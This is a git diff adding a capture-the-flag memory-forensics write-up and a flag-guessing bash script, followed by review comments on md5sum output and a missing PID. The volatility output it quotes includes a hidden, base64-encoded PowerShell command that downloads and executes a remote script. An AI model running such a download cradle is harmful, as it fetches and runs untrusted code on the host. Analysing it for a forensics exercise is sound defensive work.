diff --git a/forensics/honeypot/README.md b/forensics/honeypot/README.md new file mode 100644 index 0000000..37d59db --- /dev/null +++ b/forensics/honeypot/README.md 
@@ -0,0 +1,105 @@ +# Honeypot + +Santa really encourages people to be at his good list but sometimes he is a bit +naughty himself. He is using a Windows 7 honeypot to capture any suspicious +action. Since he is not a forensics expert, can you help him identify any +indications of compromise? + +1. Find the full URL used to download the malware. +2. Find the malicious's process ID. +3. Find the attackers IP + +Flag Format: HTB{echo -n "http://url.com/path.foo_PID_127.0.0.1" | md5sum} +Download Link: http://46.101.25.140/forensics_honeypot.zip + +## Flag + +## Progress so far + +- The honeypot.zip file contains รค windows memory dump +- By using the `volatility3` framework one can extract data from the dump +- By checking `vol -f honeypot.raw windows.cmdline.CMDLine` the malicious process is quite obvious + +```bash +cat win_cmdline + +... snip ... + +3504 VBoxTray.exe "C:\Windows\System32\VBoxTray.exe" +3112 WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe +3324 iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" +3344 iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" +SCODEF:3324 CREDAT:14337 +2700 powershell.exe +"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /window hidden /e +aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA== +3732 conhost.exe \??\C:\Windows\system32\conhost.exe +"288449379-1457209856-1923954052-101100547-172367320720102786213404402731845854479 +4028 whoami.exe Required memory at 0x7ffdf010 is not valid (process exited?) +4036 HOSTNAME.EXE Required memory at 0x7ffd7010 is not valid (process +exited?) 
+2924 DumpIt.exe "C:\Users\Santa\Desktop\DumpIt.exe" +2920 conhost.exe \??\C:\Windows\system32\conhost.exe +"280284285205075330588133904-110126809119471720131011406317-845024101-1158882802 +168 dllhost.exe C:\Windows\system32\DllHost.exe +/Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} +``` + +- The base64 string in the powershell command contains a url which contains a rickroll, this has to be the url +- The PID of said command is 2700 +- By examining the currently active connections, using `vol -f honeypot.raw windows.netscan.Netscan` the following foreign IPs stand out: + +``` +Volatility 3 Framework 1.0.1 +Offset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner +Created + +0x2554b460 TCPv4 10.0.2.15 49226 93.184.220.29 80 ESTABLISHED - - - +0x261e9d30 TCPv4 10.0.2.15 49228 172.67.177.22 443 ESTABLISHED - - - +0x3e2e9cc0 TCPv4 10.0.2.15 49221 212.205.126.106 443 ESTABLISHED - - - +0x3ee98d80 TCPv4 10.0.2.15 49229 147.182.172.189 4444 ESTABLISHED - - - +0x3f1b0df8 TCPv4 10.0.2.15 49216 212.205.126.106 443 ESTABLISHED - - - +0x3f225df8 TCPv4 10.0.2.15 49222 212.205.126.106 443 ESTABLISHED - - - +0x3f547008 TCPv4 10.0.2.15 49220 212.205.126.106 443 ESTABLISHED - - - +0x3f561438 TCPv4 10.0.2.15 49215 204.79.197.203 443 ESTABLISHED - - - +0x3f57c438 TCPv4 10.0.2.15 49218 95.100.210.141 443 ESTABLISHED - - - +0x3f58b4c8 TCPv4 10.0.2.15 49217 212.205.126.106 443 ESTABLISHED - - - +0x3f58c748 TCPv4 10.0.2.15 49223 212.205.126.106 443 ESTABLISHED - - - +0x3f58e9d8 TCPv4 10.0.2.15 49225 172.67.177.22 443 ESTABLISHED - - - +0x3f5c6df8 TCPv4 10.0.2.15 49219 95.100.210.141 443 ESTABLISHED - - - +``` + +- By eliminating all the ips which belong to M$ we end up with a small set of 5 ips. +- To generate the flag the follwing shell script was used, sadly with no success. +- I'm unsure about the `... | md5sum` part as this adds a hyphen... 
+ +```cat generate_flags.sh +#!/bin/bash + +list=( + 147.182.172.189 # digital ocean + #172.67.177.22 # cloudflare net + #212.205.126.106 # greece + #93.184.220.29 # edgecast + #95.100.210.141 # akamai +) + +pids=( + 1556 # explorer + 2460 # SearchFilterHo + 2856 # explorer + 3324 # iexplorer + 3344 # iexplorer +) + +for ip in ${list[@]}; do + for pid in ${pids[@]}; do + echo Generating Flag for $ip and $pid: + echo "HTB{echo -n "https://windowsliveupdater.com/update.ps1_"$pid"_"$ip""|md5sum}" + echo "HTB{$(echo -n "https://windowsliveupdater.com/update.ps1_"$pid"_"$ip""|md5sum)}" + done +done +``` + + +- I don't know, maybe the challenge is borked somehow? diff --git a/forensics/honeypot/generate_flags.sh b/forensics/honeypot/generate_flags.sh index 636b329..0201871 100755 --- a/forensics/honeypot/generate_flags.sh +++ b/forensics/honeypot/generate_flags.sh @@ -1,21 +1,25 @@ #!/bin/bash list=( - 10.0.2.15 - 127.0.0.1 - 65.55.44.109 - 147.182.172.189 - 172.67.177.22 - 204.79.197.203 - 212.205.126.106 - 93.184.220.29 - 95.100.210.141 + 147.182.172.189 # digital ocean + #172.67.177.22 # cloudflare net + #212.205.126.106 # greece + #93.184.220.29 # edgecast + #95.100.210.141 # akamai ) +pids=( + 1556 # explorer + 2460 # SearchFilterHo + 2856 # explorer + 3324 # iexplorer + 3344 # iexplorer +) for ip in ${list[@]}; do - echo Generating Flag from $ip: - echo "HTB{echo -n "https://windowsliveupdater.com/update.ps1_2700_$ip"|md5sum}" - echo "HTB{$(echo -n "https://windowsliveupdater.com/update.ps1_2700_$ip"|md5sum)}" + for pid in ${pids[@]}; do + echo Generating Flag for $ip and $pid: + echo "HTB{echo -n "https://windowsliveupdater.com/update.ps1_"$pid"_"$ip""|md5sum}" + echo "HTB{$(echo -n "https://windowsliveupdater.com/update.ps1_"$pid"_"$ip""|md5sum)}" + done done -
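Review bot: The hyphen the README asks about (the `... | md5sum` line in the "Progress so far" section) is the stdin filename marker: `md5sum` prints `<hash>  -` when it reads from a pipe, so `echo "HTB{$(echo -n ... | md5sum)}"` in the embedded script produces `HTB{<hash>  -}` rather than `HTB{<hash>}`. Pipe through `cut -d' ' -f1` (or `awk '{print $1}'`) before wrapping in the braces, e.g. `echo "HTB{$(echo -n "https://windowsliveupdater.com/update.ps1_${pid}_${ip}" | md5sum | cut -d' ' -f1)}"`. Two documentation gaps in the same hunk: the `## Flag` section is left empty, and the README never states the decoded URL explicitly; it only appears as the literal in the script, so the decoding step from the base64 in the `powershell.exe /e` command line should be written out in the bullet that calls it "the url". The netscan bullet also says five IPs remain after removing Microsoft ranges, yet the embedded script comments out four of them and keeps only the DigitalOcean address; a sentence explaining that choice (the 4444 connection on `147.182.172.189` is the only one not on 80/443) would make the write-up follow.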
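Review bot: The `pids` array introduced in the `generate_flags.sh` hunk drops PID 2700, which the removed lines hard-coded (`update.ps1_2700_$ip`) and which the README in this same patch identifies as the malicious process; the new loop only tries explorer, SearchFilterHost and iexplore PIDs, so the candidate the write-up itself argues for is never hashed. Add `2700 # powershell` back to the array (ideally as the first entry). Two smaller points: the `$(... | md5sum)` substitution still carries the trailing `  -` into the flag string, so the hash needs `| cut -d' ' -f1` before the closing brace; and the loops should quote their expansions (`for ip in "${list[@]}"`, `for pid in "${pids[@]}"`) so the script stays correct if the arrays ever hold entries with spaces.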